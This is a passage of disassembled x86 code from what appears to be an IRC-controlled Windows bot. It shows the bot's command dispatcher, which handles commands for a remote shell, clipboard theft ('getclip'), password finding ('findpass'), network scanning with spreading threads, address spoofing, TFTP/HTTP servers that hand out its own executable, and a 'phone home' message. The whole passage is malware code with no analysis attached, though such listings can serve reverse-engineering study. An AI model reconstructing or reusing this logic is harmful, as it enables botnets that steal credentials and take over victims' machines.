jz loc_404AB7
push edi ; Str2
push offset aDriveinfo ; "driveinfo"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404AA0
push edi ; Str2
push offset aDrv ; "drv"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404AA0
push edi ; Str2
push offset aTestdlls ; "testdlls"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404A8A
push edi ; Str2
push offset aDll ; "dll"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404A8A
push edi ; Str2
push offset aOpencmd ; "opencmd"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404A1C
push edi ; Str2
push offset aOcmd ; "ocmd"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404A1C
push edi ; Str2
push offset aCmdstop ; "cmdstop"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_403EB3
push dword ptr [ebp+esi+4Ch+Args]
push 0Ah
push offset aRemoteShell ; "Remote shell"
push offset dword_42F5F4
jmp loc_40505B
; ---------------------------------------------------------------------------
loc_403EB3: ; CODE XREF: sub_40274D+174F�j
push edi ; Str2
push offset aWho ; "who"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_403FC1
cmp [ebp+4Ch+var_C], ebx
jnz short loc_403EE4
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset dword_42F5DC ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_403EE4: ; CODE XREF: sub_40274D+177E�j
mov eax, [ebp+4Ch+Str1]
mov [ebp+4Ch+var_24], ebx
mov [ebp+4Ch+var_14], eax
jmp short loc_403EF2
; ---------------------------------------------------------------------------
loc_403EEF: ; CODE XREF: sub_40274D+17EE�j
mov eax, [ebp+4Ch+var_14]
loc_403EF2: ; CODE XREF: sub_40274D+17A0�j
cmp [eax], bl
jz short loc_403EF9
inc eax
jmp short loc_403EFE
; ---------------------------------------------------------------------------
loc_403EF9: ; CODE XREF: sub_40274D+17A7�j
mov eax, offset aEmpty ; "<Empty>"
loc_403EFE: ; CODE XREF: sub_40274D+17AA�j
push eax
push [ebp+4Ch+var_24]
lea eax, [ebp+4Ch+Dst]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add [ebp+4Ch+var_14], 80h
add esp, 24h
inc [ebp+4Ch+var_24]
cmp [ebp+4Ch+var_24], 3
jl short loc_403EEF
push offset unk_42F5A8
call sub_417D70
pop ecx
loc_403F48: ; CODE XREF: sub_40274D+1A74�j
; sub_40274D+2D0A�j
mov eax, dword ptr [ebp+esi+4Ch+Args]
cmp eax, ebx
mov [ebp+4Ch+var_8], eax
jz loc_402B92
push edi ; Str2
push offset aSpoof ; "spoof"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_405563
mov esi, [ebp+4Ch+var_8]
push offset Str2 ; "off"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_405469
lea eax, [ebp+4Ch+Dst]
push offset asc_42F574 ; "-"
push eax ; Dest
mov dword_4D5898, ebx
call _sprintf
pop ecx
pop ecx
loc_403F9D: ; CODE XREF: sub_40274D+2DBD�j
; sub_40274D+2DE3�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_404979
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
jmp loc_409FDB
; ---------------------------------------------------------------------------
loc_403FC1: ; CODE XREF: sub_40274D+1775�j
push edi ; Str2
push offset aGetclip ; "getclip"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4049DC
push edi ; Str2
push offset aGc ; "gc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4049DC
push edi ; Str2
push offset aFlusharp ; "flusharp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4049BF
push edi ; Str2
push offset aFarp ; "farp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4049BF
push edi ; Str2
push offset aFlushdns ; "flushdns"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404981
push edi ; Str2
push offset aFdns ; "fdns"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404981
push edi ; Str2
push offset aCurrentip ; "currentip"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40494B
push edi ; Str2
push offset aCip ; "cip"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40494B
push edi ; Str2
push offset aRloginserver ; "rloginserver"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404809
push edi ; Str2
push offset aRlogin ; "rlogin"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404809
push edi ; Str2
push offset aHttpserver ; "httpserver"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40469D
push edi ; Str2
push offset aHttp ; "http"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40469D
push edi ; Str2
push offset aTftpserver ; "tftpserver"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404575
push edi ; Str2
push offset aTftp ; "tftp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404575
push edi ; Str2
push offset aCrash ; "crash"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_40414A
lea eax, [ebp+4Ch+Dst]
push offset asc_42F4CC ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+4Ch+var_C], ebx
pop ecx
pop ecx
jnz short loc_404129
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_404129: ; CODE XREF: sub_40274D+19C1�j
lea eax, [ebp+4Ch+Dst]
push eax ; Str2
call sub_417D70
mov [esp+5DA0h+var_5DEC], offset aCrash ; "crash"
push [ebp+esi+4Ch+var_90] ; Str1
call _strcmp
jmp loc_40A216
; ---------------------------------------------------------------------------
loc_40414A: ; CODE XREF: sub_40274D+19A9�j
push edi ; Str2
push offset aScanall ; "scanall"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404279
push edi ; Str2
push offset aSa ; "sa"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_404279
push edi ; Str2
push offset aPhonehome ; "phonehome"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4041A1
lea eax, [ebp+4Ch+var_D0]
push eax ; Args
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: hi ;).\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
loc_404199: ; CODE XREF: sub_40274D+418�j
add esp, 0Ch
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_4041A1: ; CODE XREF: sub_40274D+1A36�j
push edi ; Str2
push offset aFindpass ; "findpass"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_4041C7
push edi ; Str2
push offset aFp ; "fp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_403F48
loc_4041C7: ; CODE XREF: sub_40274D+1A63�j
push [ebp+4Ch+Format] ; Format
lea eax, [ebp+4Ch+var_F5C]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_F60], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_ED8], eax
mov eax, [ebp+4Ch+var_C]
push offset asc_42F45C ; "-"
mov [ebp+4Ch+var_ED4], eax
lea eax, [ebp+4Ch+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 26h ; int
push eax ; Source
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_EDC], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_F60]
push eax
push offset sub_419FFD
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_EDC]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_40426C
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42F420
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_404264: ; CODE XREF: sub_40274D+1B25�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40426C: ; CODE XREF: sub_40274D+1B04�j
cmp [ebp+4Ch+var_ED0], ebx
jz short loc_404264
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_404279: ; CODE XREF: sub_40274D+1A0C�j
; sub_40274D+1A21�j
mov al, byte_43DF5A
cmp al, bl
mov [ebp+4Ch+var_14], ebx
mov edx, offset byte_43DF5A
jz loc_402B92
mov ecx, edx
loc_404290: ; CODE XREF: sub_40274D+1B4B�j
inc [ebp+4Ch+var_14]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_404290
cmp al, bl
jz loc_402B92
mov [ebp+4Ch+var_20], edx
mov esi, offset a_fast__1 ; "#.fast.#"
loc_4042AA: ; CODE XREF: sub_40274D+1E01�j
push 0Bh
call sub_40B075
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+4Ch+var_14]
add eax, ecx
cmp eax, 1F4h
jle short loc_4042F6
push ecx
lea eax, [ebp+4Ch+Dst]
push offset asc_42F3E0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 20h
jmp loc_404545
; ---------------------------------------------------------------------------
loc_4042F6: ; CODE XREF: sub_40274D+1B77�j
or [ebp+4Ch+var_738], 0FFFFFFFFh
cmp dword_43D878, ebx
mov [ebp+4Ch+var_73C], 64h
mov [ebp+4Ch+var_750], 5
mov [ebp+4Ch+var_74C], 320h
mov [ebp+4Ch+var_14], ebx
jz short loc_404367
mov edi, offset dword_43D878
loc_40432B: ; CODE XREF: sub_40274D+1BFC�j
mov eax, [ebp+4Ch+var_20]
add eax, 0FFFFFFF6h
push eax ; Str2
lea eax, [edi-28h]
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_40434D
inc [ebp+4Ch+var_14]
add edi, 40h
cmp [edi], ebx
jnz short loc_40432B
jmp short loc_404367
; ---------------------------------------------------------------------------
loc_40434D: ; CODE XREF: sub_40274D+1BF2�j
mov eax, [ebp+4Ch+var_14]
mov ecx, eax
shl ecx, 6
mov ecx, dword_43D878[ecx]
mov [ebp+4Ch+var_754], ecx
mov [ebp+4Ch+var_738], eax
loc_404367: ; CODE XREF: sub_40274D+1BD7�j
; sub_40274D+1BFE�j
cmp [ebp+4Ch+var_754], ebx
jz loc_40456B
push 10h
pop edi
lea eax, [ebp+4Ch+var_2E0]
push eax
lea eax, [ebp+4Ch+var_314]
push eax
push [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_2E0], edi
call dword_444068 ; getsockname
mov al, [ebp+4Ch+var_907]
neg al
push edi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+4Ch+Count], eax
push [ebp+4Ch+Count] ; Count
call dword_444188 ; inet_ntoa
push eax ; Source
lea eax, [ebp+4Ch+var_868]
push eax ; Dest
call _strncpy
xor eax, eax
cmp [ebp+4Ch+var_907], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+4Ch+var_868]
push eax ; Str
call _strrchr
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+4Ch+arg_0+3], bl
jle short loc_404410
loc_4043EE: ; CODE XREF: sub_40274D+1CC1�j
cmp eax, ebx
jz short loc_404410
mov byte ptr [eax], 78h
lea eax, [ebp+4Ch+var_868]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+4Ch+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+4Ch+arg_0+3]
cmp ecx, edi
jl short loc_4043EE
loc_404410: ; CODE XREF: sub_40274D+1C9F�j
; sub_40274D+1CA3�j
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+Format] ; Format
mov [ebp+4Ch+var_758], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_730], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_72C], eax
mov edi, 80h
lea eax, [ebp+4Ch+var_858]
push edi ; Count
push eax ; Dest
mov [ebp+4Ch+var_728], 1
call __snprintf
push offset byte_42B633 ; Str2
push esi ; Str1
call _strcmp
add esp, 14h
test eax, eax
jz short loc_40446F
push esi ; Format
lea eax, [ebp+4Ch+var_7D8]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_404475
; ---------------------------------------------------------------------------
loc_40446F: ; CODE XREF: sub_40274D+1D0D�j
mov [ebp+4Ch+var_7D8], bl
loc_404475: ; CODE XREF: sub_40274D+1D20�j
cmp [ebp+4Ch+var_728], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_404487
mov eax, offset aSequential ; "Sequential"
loc_404487: ; CODE XREF: sub_40274D+1D33�j
push [ebp+4Ch+var_73C]
lea ecx, [ebp+4Ch+var_868]
push [ebp+4Ch+var_74C]
push [ebp+4Ch+var_750]
push [ebp+4Ch+var_754]
push ecx
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42F360 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 0Bh ; int
push eax ; Source
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_748], eax
lea eax, [ebp+4Ch+var_1C]
push eax ; Args
push ebx
lea eax, [ebp+4Ch+var_868]
push eax
push offset sub_40BEFE
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_748]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_404561
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42F324 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40451A: ; CODE XREF: sub_40274D+1E1C�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_404538
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_404538: ; CODE XREF: sub_40274D+1DD0�j
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
pop ecx
loc_404545: ; CODE XREF: sub_40274D+1BA4�j
add [ebp+4Ch+var_20], 0Bh
mov eax, [ebp+4Ch+var_20]
cmp [eax], bl
jnz loc_4042AA
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_404559: ; CODE XREF: sub_40274D+1E1A�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404561: ; CODE XREF: sub_40274D+1DB0�j
cmp [ebp+4Ch+var_724], ebx
jz short loc_404559
jmp short loc_40451A
; ---------------------------------------------------------------------------
loc_40456B: ; CODE XREF: sub_40274D+1C20�j
push offset unk_42F2EC
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_404575: ; CODE XREF: sub_40274D+197F�j
; sub_40274D+1994�j
push 5
call sub_40B075
test eax, eax
pop ecx
jle short loc_40458B
push offset unk_42F2CC
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_40458B: ; CODE XREF: sub_40274D+1E32�j
mov eax, dword ptr [ebp+esi+4Ch+Args]
cmp eax, ebx
mov edi, 104h
jz short loc_4045AB
push eax ; Format
lea eax, [ebp+4Ch+var_2D58]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_4045BA
; ---------------------------------------------------------------------------
loc_4045AB: ; CODE XREF: sub_40274D+1E49�j
push edi
lea eax, [ebp+4Ch+var_2D58]
push eax
push ebx
call ds:dword_42B00C ; GetModuleFileNameA
loc_4045BA: ; CODE XREF: sub_40274D+1E5C�j
mov esi, [ebp+esi+4Ch+Format]
cmp esi, ebx
jnz short loc_4045C7
mov esi, offset aWindows_exe ; "windows.exe"
loc_4045C7: ; CODE XREF: sub_40274D+1E73�j
push esi ; Format
lea eax, [ebp+4Ch+var_2C54]
push edi ; Count
push eax ; Dest
call __snprintf
mov eax, dword_43C074
mov [ebp+4Ch+var_2B48], eax
mov eax, [ebp+4Ch+arg_4]
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
mov [ebp+4Ch+var_2D5C], eax
lea eax, [ebp+4Ch+var_2B44]
push eax ; Dest
mov [ebp+4Ch+var_2B4C], ebx
call _strncpy
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_2AC4], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2AC0], eax
lea eax, [ebp+4Ch+var_2D58]
push eax
push [ebp+4Ch+var_2B48]
lea eax, [ebp+4Ch+Dst]
push offset asc_42F298 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 5 ; int
push eax ; Source
call sub_40AE85
add esp, 34h
mov [ebp+4Ch+var_2B50], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2D5C]
push eax
push offset sub_4146A1
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2B50]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_404690
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42F25C
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_404688: ; CODE XREF: sub_40274D+1F49�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404690: ; CODE XREF: sub_40274D+1F28�j
cmp [ebp+4Ch+var_2ABC], ebx
jz short loc_404688
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_40469D: ; CODE XREF: sub_40274D+1955�j
; sub_40274D+196A�j
mov edi, dword ptr [ebp+esi+4Ch+Args]
cmp edi, ebx
jz short loc_4046B9
push edi ; Str
call j__atol
test eax, eax
pop ecx
jz short loc_4046B9
push edi ; Str
call j__atol
pop ecx
jmp short loc_4046BE
; ---------------------------------------------------------------------------
loc_4046B9: ; CODE XREF: sub_40274D+1F56�j
; sub_40274D+1F61�j
mov eax, dword_43C078
loc_4046BE: ; CODE XREF: sub_40274D+1F6A�j
mov esi, [ebp+esi+4Ch+Format]
mov [ebp+4Ch+var_36D0], eax
xor eax, eax
cmp [ebp+4Ch+var_904], bl
setz al
cmp esi, ebx
mov [ebp+4Ch+var_36BC], eax
jz short loc_4046EE
lea eax, [ebp+4Ch+var_37D4]
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_404719
; ---------------------------------------------------------------------------
loc_4046EE: ; CODE XREF: sub_40274D+1F8E�j
push 104h
lea eax, [ebp+4Ch+FullPath]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
push ebx ; Ext
push ebx ; Filename
push ebx ; Dir
lea eax, [ebp+4Ch+Drive]
push eax ; Drive
lea eax, [ebp+4Ch+FullPath]
push eax ; FullPath
call __splitpath
add esp, 14h
loc_404719: ; CODE XREF: sub_40274D+1F9F�j
lea eax, [ebp+4Ch+var_37D4]
push eax ; Str
call _strlen
cmp [ebp+eax+4Ch+var_37D5], 5Ch
pop ecx
jnz short loc_404744
lea eax, [ebp+4Ch+var_37D4]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+4Ch+var_37D5], bl
loc_404744: ; CODE XREF: sub_40274D+1FE1�j
push [ebp+4Ch+Format] ; Format
mov esi, [ebp+4Ch+arg_4]
lea eax, [ebp+4Ch+var_3A5C]
push 80h ; Count
push eax ; Dest
mov [ebp+4Ch+var_3A60], esi
call __snprintf
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 0Ch
mov [ebp+4Ch+var_36C0], eax
lea eax, [ebp+4Ch+var_37D4]
push eax
push [ebp+4Ch+var_36D0]
mov [ebp+4Ch+var_36C4], edi
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42F220 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 3 ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_36C8], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3A60]
push eax
push offset sub_412DD9
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_36C8]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4047FC
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42F1E4
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4047F4: ; CODE XREF: sub_40274D+20B5�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4047FC: ; CODE XREF: sub_40274D+2094�j
cmp [ebp+4Ch+var_36B4], ebx
jz short loc_4047F4
jmp loc_404929
; ---------------------------------------------------------------------------
loc_404809: ; CODE XREF: sub_40274D+192B�j
; sub_40274D+1940�j
mov edi, dword ptr [ebp+esi+4Ch+Args]
cmp edi, ebx
jz short loc_404825
push edi ; Str
call j__atol
test eax, eax
pop ecx
jz short loc_404825
push edi ; Str
call j__atol
pop ecx
jmp short loc_40482A
; ---------------------------------------------------------------------------
loc_404825: ; CODE XREF: sub_40274D+20C2�j
; sub_40274D+20CD�j
mov eax, dword_43C07C
loc_40482A: ; CODE XREF: sub_40274D+20D6�j
mov [ebp+4Ch+var_182C], eax
mov eax, [ebp+esi+4Ch+Format]
cmp eax, ebx
jnz short loc_40483E
lea eax, [ebp+4Ch+var_D0]
loc_40483E: ; CODE XREF: sub_40274D+20E9�j
push eax ; Format
lea eax, [ebp+4Ch+var_196C]
push 40h ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+4Ch+var_98]
add esp, 0Ch
cmp esi, ebx
jnz short loc_40485D
mov esi, offset byte_42B633
loc_40485D: ; CODE XREF: sub_40274D+2109�j
push esi ; Format
lea eax, [ebp+4Ch+var_192C]
push 100h ; Count
push eax ; Dest
call __snprintf
push [ebp+4Ch+Format] ; Format
lea eax, [ebp+4Ch+var_19EC]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+var_C]
mov esi, [ebp+4Ch+arg_4]
mov edi, [ebp+4Ch+var_4]
add esp, 18h
mov [ebp+4Ch+var_1818], eax
lea eax, [ebp+4Ch+var_196C]
push eax
push [ebp+4Ch+var_182C]
mov [ebp+4Ch+var_19F0], esi
push esi
mov [ebp+4Ch+var_181C], edi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42F1A8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 9 ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_1828], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_19F0]
push eax
push offset sub_413A51
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1828]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_404941
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset asc_42F16C ; "-"
loc_40491A: ; CODE XREF: sub_40274D+20A2�j
; sub_40274D+4A78�j ...
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_404929: ; CODE XREF: sub_40274D+20B7�j
; sub_40274D+21FC�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_408D10
push ebx
push edi
jmp loc_4089CD
; ---------------------------------------------------------------------------
loc_404939: ; CODE XREF: sub_40274D+21FA�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404941: ; CODE XREF: sub_40274D+21BF�j
cmp [ebp+4Ch+var_1814], ebx
jz short loc_404939
jmp short loc_404929
; ---------------------------------------------------------------------------
loc_40494B: ; CODE XREF: sub_40274D+1901�j
; sub_40274D+1916�j
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
jz short loc_40495B
push esi ; Str
call j__atol
jmp short loc_404962
; ---------------------------------------------------------------------------
loc_40495B: ; CODE XREF: sub_40274D+2204�j
push 0Bh
call sub_40B094
loc_404962: ; CODE XREF: sub_40274D+220C�j
cmp eax, ebx
pop ecx
jz short loc_404979
push eax ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40B619
loc_404976: ; CODE XREF: sub_40274D+26CB�j
add esp, 10h
loc_404979: ; CODE XREF: sub_40274D+5C8�j
; sub_40274D+5D4�j ...
mov eax, [ebp+4Ch+arg_24]
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404981: ; CODE XREF: sub_40274D+18D7�j
; sub_40274D+18EC�j
mov eax, dword_4441F0
cmp eax, ebx
jz short loc_4049A4
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+4Ch+Dst]
jz short loc_40499D
push offset unk_42F148
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_40499D: ; CODE XREF: sub_40274D+2247�j
push offset unk_42F11C
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_4049A4: ; CODE XREF: sub_40274D+223B�j
push offset asc_42F0F0 ; "-"
lea eax, [ebp+4Ch+Dst]
loc_4049AF: ; CODE XREF: sub_40274D+224E�j
; sub_40274D+2255�j ...
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_4076E0
; ---------------------------------------------------------------------------
loc_4049BF: ; CODE XREF: sub_40274D+18AD�j
; sub_40274D+18C2�j
call sub_4022F5
test eax, eax
lea eax, [ebp+4Ch+Dst]
jz short loc_4049D5
push offset unk_42F0CC
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_4049D5: ; CODE XREF: sub_40274D+227F�j
push offset unk_42F0A0
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_4049DC: ; CODE XREF: sub_40274D+1883�j
; sub_40274D+1898�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_4049F8
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset dword_42F088 ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_4049F8: ; CODE XREF: sub_40274D+2292�j
push ebx ; int
push [ebp+4Ch+var_4] ; int
call sub_41AD5A
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push offset dword_42F06C
loc_404A12: ; CODE XREF: sub_40274D+257D�j
; sub_40274D+25AC�j
call sub_417D70
jmp loc_409FB6
; ---------------------------------------------------------------------------
loc_404A1C: ; CODE XREF: sub_40274D+1725�j
; sub_40274D+173A�j
push 0Ah
call sub_40B075
test eax, eax
pop ecx
jle short loc_404A2F
push offset unk_42F040
jmp short loc_404A4D
; ---------------------------------------------------------------------------
loc_404A2F: ; CODE XREF: sub_40274D+22D9�j
push [ebp+4Ch+Format]
push [ebp+4Ch+arg_4]
call sub_41C9D4
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_404A48
push offset unk_42F018
jmp short loc_404A4D
; ---------------------------------------------------------------------------
loc_404A48: ; CODE XREF: sub_40274D+22F2�j
push offset asc_42EFF8 ; "-"
loc_404A4D: ; CODE XREF: sub_40274D+22E0�j
; sub_40274D+22F9�j ...
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_404A5B: ; CODE XREF: sub_40274D+5574�j
; sub_40274D+6E4D�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_404A79
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
loc_404A71: ; CODE XREF: sub_40274D+6ADF�j
call sub_40123B
add esp, 14h
loc_404A79: ; CODE XREF: sub_40274D+2311�j
; sub_40274D+2508�j ...
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
jmp loc_40A217
; ---------------------------------------------------------------------------
loc_404A8A: ; CODE XREF: sub_40274D+16FB�j
; sub_40274D+1710�j
push [ebp+4Ch+var_C] ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_401F92
jmp loc_404D0F
; ---------------------------------------------------------------------------
loc_404AA0: ; CODE XREF: sub_40274D+16D1�j
; sub_40274D+16E6�j
push dword ptr [ebp+esi+4Ch+Args] ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_419725
jmp loc_404D0F
; ---------------------------------------------------------------------------
loc_404AB7: ; CODE XREF: sub_40274D+16A7�j
; sub_40274D+16BC�j
or edi, 0FFFFFFFFh
call ds:dword_42B038 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
mov [ebp+4Ch+arg_0], eax
jz short loc_404ADD
push esi ; Str
call j__atol
pop ecx
mov edi, eax
